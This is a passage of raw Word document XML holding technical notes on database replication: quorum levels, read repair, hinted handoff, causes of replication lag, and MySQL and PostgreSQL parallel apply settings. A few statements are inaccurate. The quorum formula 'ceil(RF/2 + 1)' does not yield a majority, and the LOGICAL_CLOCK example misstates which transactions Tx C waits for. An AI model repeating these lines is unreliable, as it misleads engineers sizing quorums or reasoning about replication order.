      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  THREE:  3 nodes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA998C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  QUORUM: ceil(RF/2 + 1) nodes = majority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31715086" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ALL:    All RF nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632AF527" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BCD29" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  LOCAL_QUORUM: quorum within the local datacenter only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA5844" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  EACH_QUORUM:  quorum in each datacenter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A8EF4B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F0B869" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Read repair:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF5569" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  On read with QUORUM: read from quorum of nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DC6FA3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Compare responses — if any node returns stale value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3BFE5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Send most recent value to stale node (read repair)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D57B72" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Stale node updates its copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEDBAA8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E646B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Hinted handoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF4F36" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If node is temporarily down when write occurs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798EABA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Any node that receives the write stores a "hint" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715BE1C2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Hint: "deliver this write to node X when it comes back"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0C363" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      When node X recovers: hints are delivered → node catches up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B84AD2A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF41C5E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Anti-entropy (background repair):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF12295" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Merkle tree comparison between nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C87F34" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Differences detected and reconciled in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC4B5E5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Prevents permanent data divergence even without reads/writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E830162" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="6CA54888">
          <v:rect id="_x0000_i5514" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D8FBB9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Replication Lag — The Consistency Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593DAA11" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Causes Replication Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB2416B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Replication lag is the delay between a transaction committing on the primary and its effects being visible on replicas. Understanding its causes is essential for building systems that correctly handle stale reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A847E4A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sources of lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED9D3F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B654DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Network transmission:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1F64E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   WAL must travel from primary to replica over network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2D047" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Local LAN: 0.1-0.5ms → negligible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BECE147" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Same city/region: 1-5ms → minor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B1E16" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Cross-region (us-east to us-west): 70ms → significant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290DFBCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Intercontinental: 150-300ms → severe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188197BB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA69383" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. WAL write-ahead on replica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1775D35F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Replica writes received WAL to disk before acknowledging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3AA1A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   NVMe SSD: ~0.1ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A576738" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   SATA SSD: ~0.5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F9EFF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   HDD: 5-10ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56235355" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2440D4A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. Apply rate limitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662AA5F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Default: single-threaded apply (one WAL record at a time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2CECE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Heavy write workload on primary → replay queue builds up on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F888E3E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Solution: parallel apply workers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5A8D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEAB1B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>4. WAL generation rate spike:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB0BE7B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Bulk INSERT/UPDATE/DELETE on primary generates massive WAL burst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8837F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   100GB UPDATE → 100GB of WAL to transmit and apply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D80348" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   During this period: replica falls behind, lag spikes dramatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1802A0FF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E7272F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>5. Long-running transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D71A07" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Replica cannot advance past an open transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0E6439" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   A 10-minute transaction on primary = 10 minutes of lag on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F27A4D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   (replica must apply the transaction atomically after seeing its COMMIT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEBA68B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4161058D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>6. Conflicting workload on replica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421ED102" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Long OLAP queries on replica → conflict with WAL apply → apply pauses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33450AF3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   (hot_standby conflict as described earlier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC1E238" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parallel Replication Apply — The Lag Reduction Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10654B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The serial apply bottleneck:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0ADE44" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Default replication applies WAL records sequentially — one record at a time, in exact commit order. This limits apply throughput to a single CPU core.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFD9F76" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MySQL parallel replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB33A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5979F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>MySQL 5.7+ parallel replication (slave_parallel_type):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A7D816" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7719A40C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>DATABASE mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB75B51" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Transactions to different databases applied in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E370F1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Transactions to the same database applied serially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B9976" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Limited parallelism for single-database workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B1A1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483580A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>LOGICAL_CLOCK mode (MySQL 5.7+):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4794A63C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Uses binlog's timestamp metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBA2E67" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    sequence_number: monotonically increasing per transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9300C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    last_committed: sequence_number of last transaction committed before this one started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B90D611" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E70F7A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Transactions with same last_committed value started before any of them committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED9CBAF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → They couldn't have had write conflicts (would have been serialized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6467E8BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Safe to apply in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015897A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE4785" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA8419" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Tx A: last_committed=1, sequence_number=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A7CAA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Tx B: last_committed=1, sequence_number=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD4778" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Tx C: last_committed=2, sequence_number=4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3BABE5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E6036" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    A and B: same last_committed → parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFDC04B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    C: depends on A or B (last_committed=2) → must wait for both A and B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C704CA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0FA9D9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  slave_parallel_workers = 16  (16 parallel apply threads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F3DC53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  slave_preserve_commit_order = 1  (maintain commit order on replica for consistent reads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B58249B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL parallel apply (PostgreSQL 16+):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8140F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA580AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>max_parallel_apply_workers_per_subscription = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74460A84" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3E0E6775" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Parallelism condition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3D6EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Streaming in-progress transactions (before COMMIT) can be applied in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D796A17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
